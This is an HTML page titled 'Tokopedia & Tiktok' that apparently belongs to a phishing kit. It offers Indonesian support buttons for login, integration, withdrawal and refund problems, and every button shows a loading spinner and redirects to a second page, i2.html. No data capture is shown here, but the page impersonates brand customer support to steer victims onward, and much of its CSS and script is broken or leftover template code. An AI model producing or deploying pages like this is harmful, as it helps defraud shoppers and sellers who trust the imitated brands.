<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="theme-color" content="">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
<title>Tokopedia & Tiktok</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
<link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Varela+Round&display=swap'>
<link rel="stylesheet" href="./style.css">

<!-- partial:index.partial.html -->
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link href="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/assets/owl.theme.default.min.css" rel="stylesheet">
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/vendors/jquery.min.js"></script>
<script src="https://owlcarousel2.github.io/OwlCarousel2/assets/owlcarousel/owl.carousel.js"></script>



<style>


 form {
  --background: ;
  --text: ;
  --radio: ;
  --radio-checked: ;
  --radio-size: 25px;
  --width: 292px;
  --height: 120px;
  --border-radius: 20px 20px 8px 8px;
  background: var(--background);
  width: var(--width);
  height: var(--height);
  border-radius: var(--border-radius);
  color: var(--text);
  position: relative;
  left: 0;
  right: 0;
  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba() 0px 2px 8px 0px;
  padding: 30px 20px;
  padding-top: 10px;
  display: block;
  grid-template-columns: auto var(--radio-size);
  font-weight: bold;
  align-items: center;
  font-family: Alata, sans-serif;
  
}
form label {
  cursor: pointer;
  color: #7C0B67;
  font-weight: bold;
  text-shadow: 1px 1px 0 #FFF;
}
form input[type=radio] {
  -webkit-appearance: none;
  -moz-appearance: none;
  position: relative;
  height: var(--radio-size);
  width: var(--radio-size);
  outline: none;
  margin: 3px 0;
  cursor: pointer;
  border: 2px solid var(--radio);
  background: transparent;
  border-radius: 50%;
  display: grid;
  justify-self: end;
  justify-items: center;
  align-items: center;
  overflow: hidden;
  transition: border 0.5s ease;
}
form input[type=radio]::before, form input[type=radio]::after {
  content: "";
  display: flex;
  justify-self: center;
  border-radius: 50%;
}
form input[type=radio]::before {
  position: absolute;
  width: 100%;
  height: 100%;
  background: var(--background);
  z-index: 1;
  opacity: var(--opacity, 1);
}
form input[type=radio]::after {
  position: relative;
  width: calc(100% /2);
  height: calc(100% /2);
  background: var(--radio-checked);
  top: var(--y, 100%);
  transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);
}
form input[type=radio]:checked {
  --radio: var(--radio-checked);
}
form input[type=radio]:checked::after {
  --y: 0%;
  -webkit-animation: stretch-animate 0.3s ease-out 0.17s;
          animation: stretch-animate 0.3s ease-out 0.17s;
}
form input[type=radio]:checked::before {
  --opacity: 0;
}
form input[type=radio]:checked ~ input[type=radio]::after {
  --y: -100%;
}
form input[type=radio]:not(:checked)::before {
  --opacity: 1;
  transition: opacity 0s linear 0.5s;
}

@-webkit-keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}

@keyframes stretch-animate {
  0% {
    transform: scale(1, 1);
  }
  28% {
    transform: scale(1.15, 0.85);
  }
  50% {
    transform: scale(0.9, 1.1);
  }
  100% {
    transform: scale(1, 1);
  }
}
body {
  background: ;
  height: 100%;
  font: 400 16px "Varela Round", sans-serif;
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}
body .socials {
  position: fixed;
  display: block;
  left: 20px;
  bottom: 20px;
}
body .socials > a {
  display: block;
  width: 30px;
  opacity: 0.2;
  transform: scale(var(--scale, 0.8));
  transition: transform 0.3s cubic-bezier(0.38, -0.12, 0.24, 1.91);
}
body .socials > a:hover {
  --scale: 1;
}   


/* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */

video::-webkit-media-controls {
    display: ;
}

video {
  display: none;
  pointer-events: none;
}


#carousel {
  grid-row: 1 / 2;
  grid-column: 1 / 8;
  width: 150vw;
  height: 500px;
  display: flex;
  align-items: center;
  justify-content: center;
  overflow: hidden;
  transform-style: preserve-3d;
  perspective: 600px;
  --items: 5;
  --middle: 3;
  --position: 1;
  pointer-events: none;
}

div.item {
  position: absolute;
  width: 300px;
  height: 400px;
  background-color: ;
  --r: calc(var(--position) - var(--offset));
  --abs: max(calc(var(--r) * -1), var(--r));
  transition: all 0.25s linear;
  transform: rotateY(calc(-10deg * var(--r)))
    translateX(calc(-300px * var(--r)));
  z-index: calc((var(--position) - var(--abs)));
}

div.item:nth-of-type(1) {
  --offset: 1;
  background-color: ;
}
div.item:nth-of-type(2) {
  --offset: 2;
  background-color: ;
}
div.item:nth-of-type(3) {
  --offset: 3;
  background-color: ;
}
div.item:nth-of-type(4) {
  --offset: 4;
  background-color: ;
}
div.item:nth-of-type(5) {
  --offset: 5;
  background-color: ;
}

 .btn-punya {
        display: inline-block;
        margin: 5px auto;
        padding: 0px;
        position: relative;
        cursor: pointer;
        left: 0;
        right: 0;
        background: none #01904E;
        border: none;
        text-align: center;
        height: 45px;
        width: 100%;
        border: 1.5px solid #ddd;
        font-family: 'Open Sans', sans-serif;
        font-size: 14px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        letter-spacing: 1px;
        line-height: 1;
        border-radius: 5px;
        box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px;
        transition: background 200ms ease 0s;
    }
    
    
   .btn-punya:active{
       opacity: 0.5;
   } 
    
    /*********************/
.process1 {
     width: 100%;
            height: 100%;
             display: flex;
             justify-content: center;
            margin: auto;
            position: absolute;
           padding-top: 300px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 99999;
            box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 0px 0px, rgba(6, 24, 44, 0.65) 0px 4px 4px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; background: #7C0B67; color: #fff; font-size: 17px; font-weight: bold;
            
            
      
}
.loading {
    position: absolute;
    display: flex;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 300px;
}
.loading img {
    width: 50px;
    
    top: 10;
}
.loading .spinner{
    position: absolute;
    width: 35px;
    animation: spin 1s linear infinite;
    -webkit-animation: spin 1s linear infinite;
    -moz-animation: spin 1s linear infinite;
    -ms-animation: spin 1s linear infinite;
    -o-animation: spin 1s linear infinite;
}
@keyframes spin {
  0% { transform: rotate(360deg); }
  100% { transform: rotate(0deg); }
}
@-webkit-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-moz-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-ms-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}
@-o-keyframes spin {
  0% { -webkit-transform: rotate(360deg); }
  100% { -webkit-transform: rotate(0deg); }
}

/*********************/

body{
    background-image: url(https://optim.tildacdn.pub/tild3362-3531-4235-b537-633338656537/-/format/webp/1000197582.jpg.webp);
    background-position: 100% 100%;
    background-size: 100% 100%;
    background-color: ;
}


.animated {
	-webkit-animation-duration: 3s;
	animation-duration: 4s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
	 -webkit-animation-name: bounceInDown; 
    animation-name: bounceInDown; 
}

@-webkit-keyframes bounceInDown { 
   0% { 
       opacity: 1; 
        -webkit-transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        -webkit-transform: translateY(0px); 
    } 
    80% { 
        -webkit-transform: translateY(0px); 
    } 
    100% { 
        -webkit-transform: translateY(0); 
    } 
} 

@keyframes bounceInDown { 
    0% { 
        opacity: 1; 
        transform: translateY(-200px); 
    } 
    60% { 
        opacity: 1; 
        transform: translateY(0px); 
    } 
    80% { 
        transform: translateY(0px); 
    } 
    100% { 
        transform: translateY(0); 
    } 
} 



<style>
#animation-demo {
	width: 200px;
	height: 150px;
	position: relative;
	background-color: ;
	line-height: 150px;
	color: #000;
	border: solid 1px ;
	text-align: center;
} 

.effec {
	-webkit-animation-duration: 2s;
	animation-duration: 2s;
	-webkit-animation-fill-mode: both;
	animation-fill-mode: both;
-webkit-animation-name: fadeInRightBig; 
    animation-name: fadeInRightBig; 
    text-align: center;
}

@-webkit-keyframes fadeInRightBig { 
    0% { 
        opacity: 1; 
        -webkit-transform: translateX(200px); 
    } 
    100% { 
        opacity: 1; 
        -webkit-transform: translateX(0); 
    } 
} 
@keyframes fadeInRightBig { 
    0% { 
        opacity: 1; 
        transform: translateX(200px); 
    } 
    100% { 
        opacity: 1; 
        transform: translateX(0); 
    } 
} 



</style>
<body>
<nav style="position: fixed; top: 0; left:0; right: 0; margin: 0px auto; width: 0%; height: 0px; background: transparent; z-index: 999999999">
</nav>
<center>
 <img id="video"
    width="0%" height="0%" style=" width: 0%;  display: inline-block; background-color:; position: absolute; top: 0; left: 0; right: 0; border-radius: 0px 0px 12px 12px; border-bottom: 3px groove #fff;  box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05);
  box-shadow: rgba(6, 24, 44, 1.4) 0px 0px 6px 6px, rgba(6, 24, 44, 0.05) 0px 4px 6px -1px, rgba(255, 255, 255, 1.08) 0px 1px 0px inset; outline: 1px solid " preload="metadata" src="https://optim.tildacdn.pub/tild3362-3531-4235-b537-633338656537/-/format/webp/1000197582.jpg.webp" type="video" class="animated">
</center>
<section class="container">
<!-- partial:index.partial.html -->
 </form>   
<form style="0">
    

 <center>
   <br><br><br>
       <button type="button" class="btn-punya" onclick="letsgo()">Kendala login</button>
     <button type="button" class="btn-punya" onclick="letsgo()">Kendala integrasi</button>
     <button type="button" class="btn-punya" onclick="letsgo()">Kendala penarikan</button>
      <button type="button" class="btn-punya" onclick="letsgo()">Kendala refund</button>
     <button type="button" class="btn-punya" onclick="letsgo()">Kendala lainya</button>
<br/>


</center>
</form>
</center>
</section>
<br/>

<!--- ## DRIBBBLE + TWITTER ############# -->


<center>
     <div id="process1" name="process" class="process1" style="display: none; background: rgba(0, 0, 0, 0.4);">
            <div class="loading">
                <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png">
                <img class="spinner" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png" id="loading" style="margin-top: -2px">
            </div>
        </div>
        </center>
<img src="https://static.tildacdn.com/tild3730-6432-4032-b436-643933653933/1000197583.jpg" style="width: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: -1;"> 
<script>
    const video = document.getElementById("video");
video.addEventListener("play", handleFirstPlay, false);

let hasPlayed = false;
function handleFirstPlay(event) {
  if (!hasPlayed) {
    hasPlayed = true;

    // Remove listener so this only gets called once.
    const vid = event.target;
    vid.removeEventListener("play", handleFirstPlay);

    // Start whatever you need to do after first playback has started
  }
}

</script>
<!-- partial -->
  <script>
var owl = $('.owl-carousel');
owl.owlCarousel({
    items:2, 
  // items change number for slider display on desktop
  
    loop:true,
    margin:10,
    autoplay:true,
    autoplayHoverPause:true
});      
      
  </script>

<script>
    /* Toggle Button to Unmute the Video */

function toggleMute() {
    var video = document.getElementById('video');
    if (video.muted) {
        video.muted = false;
    } else {
        video.muted = true;
    }
}

/* Delay Function to Add SetTimeOut After Defined Interval */

function delay(time) {
    return new Promise((resolve) => setTimeout(resolve, time));
}

/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */

function showVideo() {
    var element = document.getElementById('video');
    var button = document.getElementById('button');
    element.style.display = 'block';
    button.style.display = 'none';
    delay(100).then(() => toggleMute());
}
</script>
   <script>

        var dana1 = document.getElementById("dana1");
        var dana2 = document.getElementById("dana2");
        var dana3 = document.getElementById("dana3");
        var dana4 = document.getElementById("dana4");
 

        function play_Audio1() {

            dana1.play();
            this.currentTime = 0;
            dana2.load();
            dana3.load();
            dana4.load();
           
        }
        function play_Audio2() {

            dana2.play();
            this.currentTime = 0;
            
            dana3.load();
            dana4.load();

        }
        function play_Audio3() {

            dana4.play();
            this.currentTime = 0;
            
            dana2.load();
            dana3.load();

        }
        function play_Audio4() {

            dana3.play();
            this.currentTime = 0;
            
            dana4.load();
            dana2.load();

        }
    </script>
 

<script>
 function letsgo(){
 $("#process1").show();    
 window.location.href="i2.html";
 setTimeout(function(){
  $("#process1").fadeOut();     
 },2000);
 }   
</script>
</body>
</html>
